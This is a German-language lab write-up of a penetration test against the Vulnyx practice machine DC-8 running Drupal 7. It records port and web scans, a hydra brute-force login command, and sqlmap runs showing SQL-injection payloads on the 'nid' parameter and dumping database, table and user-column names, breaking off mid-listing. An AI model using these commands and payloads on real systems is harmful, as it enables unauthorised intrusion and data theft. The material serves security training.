DC-8 - Vulnyx - Level: Medium - Bericht

Medium

Verwendete Tools

nmap
nikto
gobuster
hydra
sqlmap
exim
wget

Inhaltsverzeichnis

Reconnaissance

ARP-Scan

192.168.2.164 08:00:27:a8:b6:73 PCS Systemtechnik GmbH

/etc/hosts

192.168.2.164 dc8.vln

Der ARP-Scan zeigt die IP-Adresse und die MAC-Adresse des Zielsystems sowie den Hersteller der Netzwerkkarte. Der Eintrag in der /etc/hosts-Datei ermöglicht die Verwendung des Hostnamens `dc8.vln` anstelle der IP-Adresse. Dies erleichtert die weitere Bearbeitung.

┌──(root㉿CCat)-[~]
└─# nmap -sS -sC -sV -A -p- $IP -Pn --min-rate 5000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-19 22:24 CEST
Nmap scan report for dc8.vln (192.168.2.164)
Host is up (0.00014s latency).
Not shown: 65533 closed tcp ports (reset)
PRT STATE SERVICE VERSIN
22/tcp open ssh penSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
| 2048 35:a7:e6:c4:a8:3c:63:1d:e1:c0:ca:a3:66:bc:88:bf (RSA)
| 256 ab:ef:9f:69:ac:ea:54:c6:8c:61:55:49:0a:e7:aa:d9 (ECDSA)
|_ 256 7a:b2:c6:87:ec:93:76:d4:ea:59:4b:1b:c6:e8:73:f2 (ED25519)
80/tcp open http Apache httpd
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-generator: Drupal 7 (http://drupal.org)
|_http-server-header: Apache
|_http-title: Welcome to DC-8 | DC-8
MAC Address: 08:00:27:A8:B6:73 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.14 ms dc8.vln (192.168.2.164)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.68 seconds

Nmap wurde verwendet, um offene Ports und laufende Dienste auf dem Zielsystem zu identifizieren. Port 22 (SSH) und Port 80 (HTTP) sind offen. Der Header `http-generator: Drupal 7` deutet auf eine Drupal 7-Installation hin.

Empfehlung:

Die Apache-Version ist nicht näher spezifiziert, sollte aber auf dem neuesten Stand gehalten werden. Die Drupal 7-Installation sollte ebenfalls auf dem neuesten Stand gehalten werden, da Drupal 7 das End-of-Life erreicht hat und keine Sicherheitsupdates mehr erhält.

Web Enumeration

- Nikto v2.5.0

+ Target IP: 192.168.2.164
+ Target Hostname: 192.168.2.164
+ Target Port: 80
+ Start Time: 2024-10-19 22:25:03 (GMT+0200)

+ Server: Apache
+ /: Drupal 7 was identified via the x-generator header. See: https://www.drupal.org/project/remove_http_headers
+ /: Drupal Link header found with value: ; rel="canonical",; rel="shortlink". See: https://www.drupal.org/
+ /dlvRKovp.php#: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /robots.txt: Entry '/UPGRADE.txt' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/?q=filter/tips/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/INSTALL.sqlite.txt' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/install.php' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/?q=user/password/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/xmlrpc.php' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/user/password/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/LICENSE.txt' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/MAINTAINERS.txt' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/user/login/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/INSTALL.mysql.txt' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/filter/tips/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/?q=user/login/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/INSTALL.pgsql.txt' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: contains 68 entries which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /: DEBUG HTTP verb may show server debugging information. See: https://docs.microsoft.com/en-us/visualstudio/debugger/how-to-enable-debugging-for-aspnet-applications?view=vs-2017
+ /: A database error may reveal internal details about the running database.
+ /web.config: ASP config file is accessible.
+ /user/: This might be interesting.
+ /UPGRADE.txt: Default file found.
+ /install.php: Drupal install.php file found. See: https://drupal.stackexchange.com/questions/269076/how-do-i-restrict-access-to-the-install-php-file
+ /install.php: install.php file found.
+ /LICENSE.txt: License file found may identify site software.
+ /xmlrpc.php: xmlrpc.php was found.
+ /INSTALL.mysql.txt: Drupal installation file found. See: https://drupal.stackexchange.com/questions/269076/how-do-i-restrict-access-to-the-install-php-file
+ /INSTALL.pgsql.txt: Drupal installation file found. See: https://drupal.stackexchange.com/questions/269076/how-do-i-restrict-access-to-the-install-php-file
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ 8978 requests: 0 error(s) and 31 item(s) reported on remote host
+ End Time: 2024-10-19 22:26:57 (GMT+0200) (114 seconds)

+ 1 host(s) tested

Nikto hat das Ziel auf bekannte Schwachstellen untersucht. Es wurde bestätigt, dass es sich um eine Drupal 7-Installation handelt. Es wurden verschiedene Dateien gefunden, die Informationen über das System liefern könnten, darunter `robots.txt`, `web.config`, `INSTALL.txt`, `LICENSE.txt`, `xmlrpc.php` und `icons/README`.

Empfehlung:

Die gefundenen Dateien sollten manuell überprüft werden, um weitere Informationen über das System zu erhalten. Die Drupal-Installation sollte auf dem neuesten Stand gehalten werden. Da Drupal 7 das End-of-Life erreicht hat, sollte ein Upgrade auf eine neuere Version in Betracht gezogen werden.

┌──(root㉿CCat)-[~]
└─# gobuster dir -u "http://$IP" -w "/usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt" -x txt....
http://192.168.2.164/index.php (Status: 200) [Size: 7948]
http://192.168.2.164/rss.xml (Status: 200) [Size: 274]
http://192.168.2.164/misc (Status: 301) [Size: 234] [--> http://192.168.2.164/misc/]
http://192.168.2.164/0 (Status: 200) [Size: 7948]
http://192.168.2.164/user (Status: 200) [Size: 8518]
http://192.168.2.164/themes (Status: 301) [Size: 236] [--> http://192.168.2.164/themes/]
http://192.168.2.164/modules (Status: 301) [Size: 237] [--> http://192.168.2.164/modules/]
http://192.168.2.164/web.config (Status: 200) [Size: 2200]
http://192.168.2.164/scripts (Status: 301) [Size: 237] [--> http://192.168.2.164/scripts/]
http://192.168.2.164/node (Status: 200) [Size: 7203]
http://192.168.2.164/sites (Status: 301) [Size: 235] [--> http://192.168.2.164/sites/]
http://192.168.2.164/includes (Status: 301) [Size: 238] [--> http://192.168.2.164/includes/]
http://192.168.2.164/install.php (Status: 200) [Size: 3326]
http://192.168.2.164/profiles (Status: 301) [Size: 238] [--> http://192.168.2.164/profiles/]
http://192.168.2.164/README.txt (Status: 200) [Size: 5382]
http://192.168.2.164/RSS.xml (Status: 200) [Size: 274]
http://192.168.2.164/robots.txt (Status: 200) [Size: 2189]
http://192.168.2.164/INSTALL.txt (Status: 200) [Size: 17995]
http://192.168.2.164/LICENSE.txt (Status: 200) [Size: 18092]
http://192.168.2.164/Rss.xml (Status: 200) [Size: 274]

Gobuster wurde verwendet, um versteckte Dateien und Verzeichnisse auf dem Webserver zu finden. Die Ergebnisse bestätigen die Drupal 7-Installation und liefern weitere Informationen über die Struktur der Website.

http://192.168.2.164/robots.txt
User-agent: *
Crawl-delay: 10
# CSS, JS, Images
Allow: /misc/*.css$
Allow: /misc/*.css?
Allow: /misc/*.js$
Allow: /misc/*.js?
Allow: /misc/*.gif
Allow: /misc/*.jpg
Allow: /misc/*.jpeg
Allow: /misc/*.png
Allow: /modules/*.css$
Allow: /modules/*.css?
Allow: /modules/*.js$
Allow: /modules/*.js?
Allow: /modules/*.gif
Allow: /modules/*.jpg
Allow: /modules/*.jpeg
Allow: /modules/*.png
Allow: /profiles/*.css$
Allow: /profiles/*.css?
Allow: /profiles/*.js$
Allow: /profiles/*.js?
Allow: /profiles/*.gif
Allow: /profiles/*.jpg
Allow: /profiles/*.jpeg
Allow: /profiles/*.png
Allow: /themes/*.css$
Allow: /themes/*.css?
Allow: /themes/*.js$
Allow: /themes/*.js?
Allow: /themes/*.gif
Allow: /themes/*.jpg
Allow: /themes/*.jpeg
Allow: /themes/*.png
# Directories
Disallow: /includes/
Disallow: /misc/
Disallow: /modules/
Disallow: /profiles/
Disallow: /scripts/
Disallow: /themes/
# Files
Disallow: /CHANGELG.txt
Disallow: /cron.php
Disallow: /INSTALL.mysql.txt
Disallow: /INSTALL.pgsql.txt
Disallow: /INSTALL.sqlite.txt
Disallow: /install.php
Disallow: /INSTALL.txt
Disallow: /LICENSE.txt
Disallow: /MAINTAINERS.txt
Disallow: /update.php
Disallow: /UPGRADE.txt
Disallow: /xmlrpc.php
# Paths (clean URLs)
Disallow: /admin/
Disallow: /comment/reply/
Disallow: /filter/tips/
Disallow: /node/add/
Disallow: /search/
Disallow: /user/register/
Disallow: /user/password/
Disallow: /user/login/
Disallow: /user/logout/
# Paths (no clean URLs)
Disallow: /?q=admin/
Disallow: /?q=comment/reply/
Disallow: /?q=filter/tips/
Disallow: /?q=node/add/
Disallow: /?q=search/
Disallow: /?q=user/password/
Disallow: /?q=user/register/
Disallow: /?q=user/login/
Disallow: /?q=user/logout/

Die Datei `robots.txt` enthält eine Liste von Verzeichnissen und Dateien, die von Suchmaschinen-Crawlern nicht indiziert werden sollen. Dies kann nützlich sein, um sensible Bereiche der Website zu identifizieren.

Empfehlung:

Die Einträge in der `robots.txt`-Datei sollten überprüft werden, um sicherzustellen, dass keine sensiblen Bereiche versehentlich offengelegt werden.

http://192.168.2.164/admin/
Access denied
You are not authorized to access this page.
Powered by Drupal

Der Zugriff auf das Administrationspanel ist ohne Anmeldung nicht möglich.

Initial Access

┌──(root㉿CCat)-[~]
└─# hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.2.164 http-post-form "/user:name=^USER^&pass=^PASS^&form_build_id=form-Broa-Shi-FEMzeXe7Kr4YS7e4noJ1SoWhHZnCNf75I&form_id=user_login&op=Log+in:Sorry, unrecognized username or password." -t 64
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these * ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-10-19 22:47:41
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344492 login tries (l:1/p:14344492), ~224133 tries per task
[DATA] attacking http-post-form://192.168.2.164:80/user:name=^USER^&pass=^PASS^&form_build_id=form-Broa-Shi-FEMzeXe7Kr4YS7e4noJ1SoWhHZnCNf75I&form_id=user_login&op=Log+in:Sorry, unrecognized username or password.
[80][http-post-form] host: 192.168.2.164 login: admin password: rockyou
[80][http-post-form] host: 192.168.2.164 login: admin password: z9hG4bK27a80d11
[80][http-post-form] host: 192.168.2.164 login: admin password: 123456
[80][http-post-form] host: 192.168.2.164 login: admin password: hostinger
[80][http-post-form] host: 192.168.2.164 login: admin password: 12345
[80][http-post-form] host: 192.168.2.164 login: admin password: princess
[80][http-post-form] host: 192.168.2.164 login: admin password: daniel

Hydra wurde verwendet, um eine Brute-Force-Attacke auf das Drupal-Login-Formular durchzuführen. Es wurden verschiedene Passwörter aus der Rockyou-Wordlist ausprobiert, aber keines war erfolgreich. Die Option `http-post-form` wurde verwendet, um die Parameter für das Login-Formular anzugeben. Die Fehlermeldung "Sorry, unrecognized username or password" wurde verwendet, um ungültige Anmeldeversuche zu identifizieren.

Analyse:

Die Brute-Force-Attacke war nicht erfolgreich, was darauf hindeutet, dass der Benutzername `admin` möglicherweise nicht existiert oder ein starkes Passwort verwendet wird. Es ist auch möglich, dass die Drupal-Installation über Sicherheitsmaßnahmen verfügt, um Brute-Force-Attacken zu verhindern.

Empfehlung:

Es sollten weitere Techniken zur Identifizierung gültiger Benutzernamen und Passwörter angewendet werden. Es sollte geprüft werden, ob die Drupal-Installation anfällig für Account-Enumeration-Schwachstellen ist.

┌──(root㉿CCat)-[~]
└─# cat /home/ccat/Downloads/sql.sql
POST /?nid=1 HTTP/1.1
Host: 192.168.2.164
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 118
Origin: http://192.168.2.164
DNT: 1
Connection: keep-alive
Referer: http://192.168.2.164/user
Cookie: has_js=1
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

name=admin&pass=admin11111&form_build_id=form-Broa-Shi-FEMzeXe7Kr4YS7e4noJ1SoWhHZnCNf75I&form_id=user_login&op=Log+in

Die Datei `/home/ccat/Downloads/sql.sql` enthält einen HTTP-Request, der zum Testen auf SQL-Injection-Schwachstellen verwendet werden soll. Der Request versucht, sich mit dem Benutzernamen `admin` und dem Passwort `admin11111` anzumelden.

┌──(root㉿CCat)-[~]
└─# sqlmap -r /home/ccat/Downloads/sql.sql --dbs --batch --dump --level=5 --risk=3 --random-agent --dbms=mysql
___
__H__
___ ___[,]_____ ___ ___ {1.8.9#stable}
|_ -| . ["] | .'| . |
|___|_ ["]_|_|_|__,| _| |_|V... |_| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 22:57:14 /2024-10-19/

[23:04:35] [INF] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.1
[23:04:35] [INF] fetching database names
[23:04:35] [WARNING] the SQL query provided does not return any output
[23:04:35] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[23:04:35] [INF] fetching number of databases
[23:04:35] [INF] retrieved:
[23:04:35] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[23:04:35] [WARNING] parameter length constraining mechanism detected (e.g. Suhosin patch). Potential problems in enumeration phase can be expected
GET parameter 'nid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 24449 HTTP(s) requests:

Parameter: nid (GET)
Type: error-based
Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
Payload: nid=(UPDATEXML(4222,CNCAT(0x2e,0x716a7a7871,(SELECT (ELT(4222=4222,1))),0x7176626a71),1091))

Type: time-based blind
Title: MySQL time-based blind - Parameter replace (ELT)
Payload: nid=ELT(5514=5514,SLEEP(5))

[23:04:35] [ERRR] unable to retrieve the number of databases
[23:04:35] [INF] falling back to current database
[23:04:35] [INF] fetching current database
[23:04:35] [INF] retrieved:
[23:04:35] [CRITICAL] unable to retrieve the database names
[23:04:35] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[23:04:35] [INF] fetching current database
[23:04:35] [INF] resumed: ''
[23:04:35] [INF] fetching tables for database: ''
[23:04:35] [WARNING] the SQL query provided does not return any output
[23:04:35] [WARNING] the SQL query provided does not return any output
[23:04:35] [INF] fetching number of tables for database ''
[23:04:35] [INF] retrieved:
[23:04:35] [WARNING] unable to retrieve the number of tables for database ''
[23:04:35] [INF] fetching number of tables for database ''
[23:04:35] [INF] retrieved:
[23:04:35] [ERRR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q] N
[23:04:35] [CRITICAL] unable to retrieve the tables in database ''
[23:04:35] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2825 times
[23:04:35] [INF] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.2.164'

[*] ending @ 23:04:35 /2024-10-19/

http://192.168.2.164/?nid=ELT(5514=5514,SLEEP(5))

kein output

SQLmap wurde verwendet, um das Zielsystem auf SQL-Injection-Schwachstellen zu testen. Die Ergebnisse deuten darauf hin, dass es zwar eine SQL-Injection-Schwachstelle gibt, aber es aufgrund von Berechtigungsproblemen oder anderen Einschränkungen nicht möglich ist, Datenbanknamen oder Tabellen abzurufen. Die vielen HTTP 500-Fehler deuten auf Probleme mit dem Zielsystem hin.

┌──(root㉿CCat)-[~]
└─# sqlmap -u http://192.168.2.164/?nid=2 --dbs --batch --level=5 --risk=3 --dbms=mysql
___
__H__
___ ___[,]_____ ___ ___ {1.8.9#stable}
|_ -| . [,] | .'| . |
|___|_ [.]_|_|_|__,| _| |_|V... |_| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 23:06:24 /2024-10-19/

[23:06:24] [INF] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:

Parameter: nid (GET)
Type: error-based
Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
Payload: nid=(UPDATEXML(4222,CNCAT(0x2e,0x716a7a7871,(SELECT (ELT(4222=4222,1))),0x7176626a71),1091))

Type: time-based blind
Title: MySQL time-based blind - Parameter replace (ELT)
Payload: nid=ELT(5514=5514,SLEEP(5))

[23:06:24] [INF] testing MySQL
[23:06:24] [WARNING] reflective value(s) found and filtering out
[23:06:24] [INF] confirming MySQL
[23:06:24] [WARNING] potential permission problems detected ('command denied')
[23:06:24] [INF] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
[23:06:24] [INF] fetching database names
[23:06:24] [INF] retrieved: 'd7db'
[23:06:25] [INF] retrieved: 'information_schema'
available databases [2]:
[*] d7db
[*] information_schema

[23:06:25] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 7 times
[23:06:25] [INF] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.2.164'

SQLmap wurde erneut verwendet, um das Zielsystem auf SQL-Injection-Schwachstellen zu testen. Diesmal konnten die Datenbanknamen `d7db` und `information_schema` erfolgreich abgerufen werden.

┌──(root㉿CCat)-[~]
└─# sqlmap -u http://192.168.2.164/?nid=2 -D d7db --tables --batch --level=5 --risk=3 --dbms=mysql
___
__H__
___ ___[.]_____ ___ ___ {1.8.9#stable}
|_ -| . [.] | .'| . |
|___|_ [.]_|_|_|__,| _| |_|V... |_| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 23:07:07 /2024-10-19/

[23:07:07] [INF] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:

Parameter: nid (GET)
Type: error-based
Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
Payload: nid=(UPDATEXML(4222,CNCAT(0x2e,0x716a7a7871,(SELECT (ELT(4222=4222,1))),0x7176626a71),1091))

Type: time-based blind
Title: MySQL time-based blind - Parameter replace (ELT)
Payload: nid=ELT(5514=5514,SLEEP(5))

[23:07:07] [INF] testing MySQL
[23:07:07] [INF] confirming MySQL
[23:07:07] [WARNING] reflective value(s) found and filtering out
[23:07:07] [WARNING] potential permission problems detected ('command denied')
[23:07:07] [INF] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
[23:07:07] [INF] fetching tables for database: 'd7db'
[23:07:07] [INF] retrieved: 'actions'
[23:07:07] [INF] retrieved: 'authmap'
[23:07:07] [INF] retrieved: 'batch'
[23:07:07] [INF] retrieved: 'block'
[23:07:07] [INF] retrieved: 'block_custom'
[23:07:07] [INF] retrieved: 'block_node_type'
[23:07:07] [INF] retrieved: 'block_role'
[23:07:07] [INF] retrieved: 'blocked_ips'
[23:07:07] [INF] retrieved: 'cache'
[23:07:07] [INF] retrieved: 'cache_block'
[23:07:07] [INF] retrieved: 'cache_bootstrap'
[23:07:07] [INF] retrieved: 'cache_field'
[23:07:07] [INF] retrieved: 'cache_filter'
[23:07:07] [INF] retrieved: 'cache_form'
[23:07:07] [INF] retrieved: 'cache_image'
[23:07:07] [INF] retrieved: 'cache_menu'
[23:07:07] [INF] retrieved: 'cache_page'
[23:07:07] [INF] retrieved: 'cache_path'
[23:07:07] [INF] retrieved: 'cache_views'
[23:07:07] [INF] retrieved: 'cache_views_data'
[23:07:07] [INF] retrieved: 'ckeditor_input_format'
[23:07:07] [INF] retrieved: 'ckeditor_settings'
[23:07:07] [INF] retrieved: 'ctools_css_cache'
[23:07:07] [INF] retrieved: 'ctools_object_cache'
[23:07:07] [INF] retrieved: 'date_format_locale'
[23:07:07] [INF] retrieved: 'date_format_type'
[23:07:07] [INF] retrieved: 'date_formats'
[23:07:08] [INF] retrieved: 'field_config'
[23:07:08] [INF] retrieved: 'field_config_instance'
[23:07:08] [INF] retrieved: 'field_data_body'
[23:07:08] [INF] retrieved: 'field_data_field_image'
[23:07:08] [INF] retrieved: 'field_data_field_tags'
[23:07:08] [INF] retrieved: 'field_revision_body'
[23:07:08] [INF] retrieved: 'field_revision_field_image'
[23:07:08] [INF] retrieved: 'field_revision_field_tags'
[23:07:08] [INF] retrieved: 'file_managed'
[23:07:08] [INF] retrieved: 'file_usage'
[23:07:08] [INF] retrieved: 'filter'
[23:07:08] [INF] retrieved: 'filter_format'
[23:07:08] [INF] retrieved: 'flood'
[23:07:08] [INF] retrieved: 'history'
[23:07:08] [INF] retrieved: 'image_effects'
[23:07:08] [INF] retrieved: 'image_styles'
[23:07:08] [INF] retrieved: 'menu_custom'
[23:07:08] [INF] retrieved: 'menu_links'
[23:07:08] [INF] retrieved: 'menu_router'
[23:07:08] [INF] retrieved: 'node'
[23:07:08] [INF] retrieved: 'node_access'
[23:07:08] [INF] retrieved: 'node_revision'
[23:07:08] [INF] retrieved: 'node_type'
[23:07:08] [INF] retrieved: 'queue'
[23:07:08] [INF] retrieved: 'rdf_mapping'
[23:07:08] [INF] retrieved: 'registry'
[23:07:08] [INF] retrieved: 'registry_file'
[23:07:08] [INF] retrieved: 'role'
[23:07:08] [INF] retrieved: 'role_permission'
[23:07:08] [INF] retrieved: 'search_dataset'
[23:07:08] [INF] retrieved: 'search_index'
[23:07:08] [INF] retrieved: 'search_node_links'
[23:07:08] [INF] retrieved: 'search_total'
[23:07:08] [INF] retrieved: 'semaphore'
[23:07:08] [INF] retrieved: 'sequences'
[23:07:08] [INF] retrieved: 'sessions'
[23:07:08] [INF] retrieved: 'shortcut_set'
[23:07:08] [INF] retrieved: 'shortcut_set_users'
[23:07:08] [INF] retrieved: 'site_messages_table'
[23:07:08] [INF] retrieved: 'system'
[23:07:08] [INF] retrieved: 'taxonomy_index'
[23:07:08] [INF] retrieved: 'taxonomy_term_data'
[23:07:08] [INF] retrieved: 'taxonomy_term_hierarchy'
[23:07:08] [INF] retrieved: 'taxonomy_vocabulary'
[23:07:08] [INF] retrieved: 'url_alias'
[23:07:08] [INF] retrieved: 'users'
[23:07:08] [INF] retrieved: 'users_roles'
[23:07:08] [INF] retrieved: 'variable'
[23:07:08] [INF] retrieved: 'views_display'
[23:07:08] [INF] retrieved: 'views_view'
[23:07:08] [INF] retrieved: 'watchdog'
[23:07:08] [INF] retrieved: 'webform'
[23:07:08] [INF] retrieved: 'webform_component'
[23:07:08] [INF] retrieved: 'webform_conditional'
[23:07:08] [INF] retrieved: 'webform_conditional_actions'
[23:07:08] [INF] retrieved: 'webform_conditional_rules'
[23:07:08] [INF] retrieved: 'webform_emails'
[23:07:08] [INF] retrieved: 'webform_last_download'
[23:07:08] [INF] retrieved: 'webform_roles'
[23:07:08] [INF] retrieved: 'webform_submissions'
[23:07:09] [INF] retrieved: 'webform_submitted_data'
Database: d7db
[88 tables]
+--+
| block |
| cache |
| filter |
| history |
| role |
| system |
| actions |
| authmap |
| batch |
| block_custom |
| block_node_type |
| block_role |
| blocked_ips |
| cache_block |
| cache_bootstrap |
| cache_field |
| cache_filter |
| cache_form |
| cache_image |
| cache_menu |
| cache_page |
| cache_path |
| cache_views |
| cache_views_data |
| ckeditor_input_format |
| ckeditor_settings |
| ctools_css_cache |
| ctools_object_cache |
| date_format_locale |
| date_format_type |
| date_formats |
| field_config |
| field_config_instance |
| field_data_body |
| field_data_field_image |
| field_data_field_tags |
| field_revision_body |
| field_revision_field_image |
| field_revision_field_tags |
| file_managed |
| file_usage |
| filter_format |
| flood |
| image_effects |
| image_styles |
| menu_custom |
| menu_links |
| menu_router |
| node |
| node_access |
| node_revision |
| node_type |
| queue |
| rdf_mapping |
| registry |
| registry_file |
| role |
| role_permission |
| search_dataset |
| search_index |
| search_node_links |
| search_total |
| semaphore |
| sequences |
| sessions |
| shortcut_set |
| shortcut_set_users |
| site_messages_table |
| system |
| taxonomy_index |
| taxonomy_term_data |
| taxonomy_term_hierarchy |
| taxonomy_vocabulary |
| url_alias |
| users |
| users_roles |
| variable |
| views_display |
| views_view |
| watchdog |
| webform |
| webform_component |
| webform_conditional |
| webform_conditional_actions |
| webform_conditional_rules |
| webform_emails |
| webform_last_download |
| webform_roles |
| webform_submissions |
| webform_submitted_data |
+--+

[23:07:09] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 97 times
[23:07:09] [INF] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.2.164'

SQLmap wurde verwendet, um die Tabellen in der Datenbank `d7db` aufzulisten. Es wurden zahlreiche Tabellen gefunden, was die Komplexität der Drupal-Installation verdeutlicht.

┌──(root㉿CCat)-[~]
└─# sqlmap -u http://192.168.2.164/?nid=2 -D d7db -T users --dump --batch --level=5 --risk=3 --dbms=mysql
___
__H__
___ ___[']_____ ___ ___ {1.8.9#stable}
|_ -| . [.] | .'| . |
|___|_ [.]_|_|_|__,| _| |_|V... |_| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 23:07:40 /2024-10-19/

[23:07:40] [INF] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:

Parameter: nid (GET)
Type: error-based
Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
Payload: nid=(UPDATEXML(4222,CNCAT(0x2e,0x716a7a7871,(SELECT (ELT(4222=4222,1))),0x7176626a71),1091))

Type: time-based blind
Title: MySQL time-based blind - Parameter replace (ELT)
Payload: nid=ELT(5514=5514,SLEEP(5))

[23:07:40] [INF] testing MySQL
[23:07:40] [INF] confirming MySQL
[23:07:41] [WARNING] reflective value(s) found and filtering out
[23:07:41] [WARNING] potential permission problems detected ('command denied')
[23:07:41] [INF] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
[23:07:41] [INF] fetching columns for table 'users' in database 'd7db'
[23:07:41] [INF] retrieved: 'uid'
[23:07:41] [INF] retrieved: 'int(10) unsigned'
[23:07:41] [INF] retrieved: 'name'
[23:07:41] [INF] retrieved: 'varchar(60)'
[23:07:41] [INF] retrieved: 'pass'
[23:07:41] [INF] retrieved: 'varchar(128)'
[23:07:41] [INF] retrieved: 'mail'
[23:07:41] [INF] retrieved: 'varchar(254)'
[23:07:41] [INF] retrieved: 'theme'
[23:07:41] [INF] retrieved: 'varchar(255)'
[23:07:41] [INF] retrieved: 'signature'
[23:07:41] [INF] retrieved: 'varchar(255)'
[23:07:41] [INF] retrieved: 'signature_format'
[23:07:41] [INF] retrieved: 'varchar(255)'
[23:07:41] [INF] retrieved: 'created'
[23:07:41] [INF] retrieved: 'int(11)'
[23:07:41] [INF] retrieved: 'access'
[23:07:41] [INF] retrieved: 'int(11)'
[23:07:41] [INF] retrieved: 'login'
[23:07:41] [INF] retrieved: 'int(11)'
[23:07:41] [INF] retrieved: 'status'
[23:07:41] [INF] retrieved: 'tinyint(4)'
[23:07:41] [INF] retrieved: 'timezone'
